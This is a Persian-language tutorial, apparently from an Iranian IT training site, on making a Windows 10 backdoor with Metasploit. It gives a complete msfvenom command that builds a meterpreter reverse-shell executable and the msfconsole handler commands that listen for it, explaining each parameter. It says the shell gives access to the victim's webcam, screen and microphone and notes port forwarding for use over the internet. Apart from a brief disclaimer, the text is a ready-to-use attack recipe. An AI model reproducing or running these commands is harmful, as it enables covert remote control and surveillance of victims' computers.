در این آموزش شما با نحوه ساخت بکدور یا همون در پشتی در متااسپلویت برای ویندوز 10 آشنا خواهید شد .*(این آموزش جهت بالابردن سطح دانش شما میباشد و هر گونه سوء استفاده بر عهده خودتان هست) اول در ترمینال لینوکس کد زیر را مینویسیم :
دوره های شبکه، برنامه نویسی، مجازی سازی، امنیت، نفوذ و ... با برترین های ایران
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST = 192.168.1.1 LPORT=4444 -o /root/Desktop/Backdoor.exe
تعریف اصطلاحات
- msfvenom : این دستور جایگزینی برای دستورات msfpayload و msfencode بود از سال 2015 با ساخت کالی ورژن 2.0 جایگزین این دو دستور شد و کارش هم ساخت پیلود و اینکودر برای بکدور هستش .
- p- : این پارامتر برای ساخت پیلود تحت یک پلت فرم مورد استفاده قرار میگیره مثلا : ویندوز یا لینوکس خودش یا اندروید و ...
- Windows : پیلود برای این پلت فرم ساخته بشه .
- meterpreter/reverse__tcp : این دستور برای اینه که بعد از اجرای بکدور توسط قربانی به شما دسترسی ریموت شل میده و میتونید با پارامتر های زیادی کار کنید . از جمله : دیدن وبکم و صفحه دسکتاپ قربانی و اسکرین شات از صفحه و ضبط صدا و ...
- platform-- windows : فقط برای ویندوز باشه بکدور اجرایی که میسازیم .
- a- : این پارامتر میاد encoder مورد نظر رو دریافت میکنه مثلا : x64 Or x86
- f- : این پارامتر میاد برای ما فرمت فایل خروجی رو تعیین میکنه : مثلا اجرایی باشه یا ...
- LHOST : با این دستور میایم یه آیپی ست میکنیم که اطلاعات ارسالی از قربانی به این آی پی ارسال بشه .
- LPORT : با این دستور میایم یه پورت ست میکنیم که اطلات ارسالی از قربانی با اسفتاده از این پورت دریافت بشه .
- o- : این پارامتر برای ایجاد خروجی هستش که بعدش با پارامتر f- میایم اون خروجی رو بهش فرمت میدیم .
- root/Desktop/Backdoor.exe : این محل دخیره فایل بکدور ما هستش که گفتیم تو مسیر روت // دسکتاپ // و با اسم بکدور ذخیره بشه .
خب بعد از ساخت ما باید یه لیسینر یا گوش دهنده بسازیم که بیاد برای ما به آی پی و پورتی که به بکدور دادیم گوش بده و اطلاعات رو برای ما دریافت کنه :
با تایپ دستور msfconsole در محیط ترمینال وارد متااسپلویت میشیم :
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.1
set LPORT 4444
exploit
توضیح اصطلاحات
- use exploit/multi/handler : این دستور میاد یه هندلر ایجاد میکنه .
- set payload windows/meterpreter/reverse_tcp : این دستور میاد به گوش هندلر میفهمونه که ما با استفاده از این پیلود میخایم ارتباط برقرار کنیم .
- set LHOST : این دستور میاد آی پی که قبلا داخل ساخت بکدور استفاده کرده بودیم رو ازمون میگیره تا به همون آی پی گوش بده .
- set LPORT : این دستور هم میاد پورتی که قبلا داخل ساخت بکدور استفاده کرده بودیم رو ازمون میگیره تا با استفاده از همون پورت اطلاعات رو بفرسته برامون .
- exploit : این دستور هم در آخر سر میاد گوش دهنده رو در حالت اجرا میزاره تا وقتی که بکدور توسط قربانی اجرا بشه .
نکته : این آموزش فقط برای شبکه داخلی یا همون Lan هستش اگر میخاهید برای Wan یا همون شبکه جهانی باشه باید عملیات پورت فورواردینگ رو انجام بدید . که داخل سایت آموزش پورت فورواردینگ هستش و نیاز به آموزش نیست .